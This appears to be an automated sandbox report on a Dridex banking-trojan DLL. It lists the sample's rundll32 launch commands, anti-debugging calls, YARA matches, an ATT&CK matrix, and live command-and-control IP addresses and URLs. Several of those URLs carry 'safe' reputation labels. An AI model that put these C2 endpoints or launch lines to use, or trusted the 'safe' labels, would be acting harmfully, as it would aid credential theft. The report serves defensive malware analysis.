                      Source: rundll32.exe, 00000003.00000003.801279123.0000000003004000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/i
                      Source: rundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/p
                      Source: rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: rundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: rundll32.exe, 00000003.00000003.557024904.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/7C
                      Source: rundll32.exe, 00000003.00000003.557024904.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/9C
                      Source: rundll32.exe, 00000003.00000003.582189208.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/IC
                      Source: rundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.582189208.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000002.870135617.0000000003071000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/R
                      Source: rundll32.exe, 00000003.00000003.542639549.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/_B
                      Source: rundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/aB
                      Source: rundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/dC
                      Source: rundll32.exe, 00000003.00000003.725673411.0000000005090000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.870520545.000000000508C000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: rundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/h.dll
                      Source: rundll32.exe, 00000003.00000003.671006878.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/mC
                      Source: rundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/r
                      Source: rundll32.exe, 00000003.00000003.542639549.000000000508F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/vB
                      Source: rundll32.exe, 00000003.00000003.565283775.0000000003004000.00000004.00000001.sdmpString found in binary or memory: https://45192.46.210.220/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFC39F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49998 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 6.3.rundll32.exe.dadb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.340db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.6cdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.dadb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.dcdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6ef90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.340db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.efdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.6cdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.dcdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.efdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6ef90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.447081469.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.871199283.000000006EF91000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.446543317.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.459341786.00000000033F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.475297637.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.474966326.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.870130062.000000006EF91000.00000020.00020000.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EF951A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA67C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA8EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAB6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB62F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAF6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EF96AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA96D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB3EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFBFA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA8AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB26B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB1EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAAE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EF99E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA9E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB7660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB2E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB1240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB0220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFBD620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EF9CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFBFA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAE3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA83C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB7FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFABF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB1730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB9B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB3B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA98DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EF9ACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAA0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA88C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA8CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB5CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA5CAC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAE0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB4CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB50A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFBDCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAD030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB1020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB89F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFB71F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAFDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EF9F9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAC590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFAD980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFBD180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EF91570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA7564
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6EFDE210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA22A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFBBE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllReversingLabs: Detection: 40%
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/2@0/5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.12095Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.23616.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.870351399.000000006F057000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.873021020.000000006F057000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.23616.dll
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFBCEF8 FindFirstFileExW,
                      Source: rundll32.exe, 00000003.00000002.870068013.0000000002FF8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW{
                      Source: rundll32.exe, 00000003.00000002.870068013.0000000002FF8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0097B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F008B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0047C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DBA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DB942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DB64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA6C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA7A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6EFD63A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.23616.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.869718613.0000000001930000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.870229775.0000000003460000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.869718613.0000000001930000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.870229775.0000000003460000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.869718613.0000000001930000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.870229775.0000000003460000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000000.00000002.869718613.0000000001930000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.870229775.0000000003460000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EFA2980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRundll321LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery23Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.23616.dll6%VirustotalBrowse
                      SecuriteInfo.com.Variant.Razy.980776.23616.dll41%ReversingLabsWin32.Infostealer.Dridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://192.46.210.220/:0%Avira URL Cloudsafe
                      https://143.244.140.214/0%URL Reputationsafe
                      https://45.77.0.96:6891/R0%Avira URL Cloudsafe
                      https://143.244.140.214:808/My0%URL Reputationsafe
                      https://185.56.219.47/0%URL Reputationsafe
                      https://45.77.0.96:6891/vB0%Avira URL Cloudsafe
                      https://143.244.140.214:808/l10%Avira URL Cloudsafe
                      https://143.244.140.214:808/h0%Avira URL Cloudsafe
                      https://192.46.210.220/I0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/aB0%Avira URL Cloudsafe
                      https://143.244.140.214:808/j0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://185.56.219.47:8116/b0%Avira URL Cloudsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://192.46.210.220/7.0.96:6891/Microsoft0%Avira URL Cloudsafe
                      https://143.244.140.214:808/l0%URL Reputationsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://192.46.210.220/gz0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/_B0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/graphy0%URL Reputationsafe
                      https://143.244.140.214:808/0%URL Reputationsafe
                      https://45192.46.210.220/0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/0%URL Reputationsafe
                      https://192.46.210.220/1-0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/9C0%Avira URL Cloudsafe
                      https://143.244.140.214:808/oft0%URL Reputationsafe
                      https://45.77.0.96:6891/7C0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/h.dll0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/mC0%Avira URL Cloudsafe
                      https://143.244.140.214:808/ll10%Avira URL Cloudsafe
                      https://192.46.210.220/563209-4053062332-1002?0%Avira URL Cloudsafe
                      https://143.244.140.214:808/lm0%Avira URL Cloudsafe
                      https://143.244.140.214:808/ll0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/dC0%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe
                      https://45.77.0.96:6891/IC0%Avira URL Cloudsafe
                      https://182.46.210.220/0%Avira URL Cloudsafe
                      https://192.46.210.220/(0%Avira URL Cloudsafe
                      https://192.46.210.220/ography0%URL Reputationsafe
                      https://192.46.210.220/=-0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/soft0%Avira URL Cloudsafe
                      https://192.46.210.220/9-0%Avira URL Cloudsafe
                      https://192.46.210.220/GlobalSign0%URL Reputationsafe
                      https://45.77.0.96:6891/Microsoft0%URL Reputationsafe
                      https://192.46.210.220/p0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/true
                      • URL Reputation: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://143.244.140.214:808/hyrundll32.exe, 00000003.00000002.870083390.0000000003004000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/:rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214/rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6891/Rrundll32.exe, 00000003.00000002.870135617.0000000003071000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/Myrundll32.exe, 00000003.00000003.542599295.0000000003004000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://185.56.219.47/rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96:6891/vBrundll32.exe, 00000003.00000003.542639549.000000000508F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/l1rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/hrundll32.exe, 00000003.00000003.834897393.0000000003004000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Irundll32.exe, 00000003.00000003.681709088.0000000003004000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/aBrundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/jrundll32.exe, 00000003.00000003.818278271.0000000003004000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://185.56.219.47:8116/rundll32.exe, 00000003.00000003.542599295.0000000003004000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://185.56.219.47:8116/brundll32.exe, 00000003.00000002.870135617.0000000003071000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/Certificationrundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
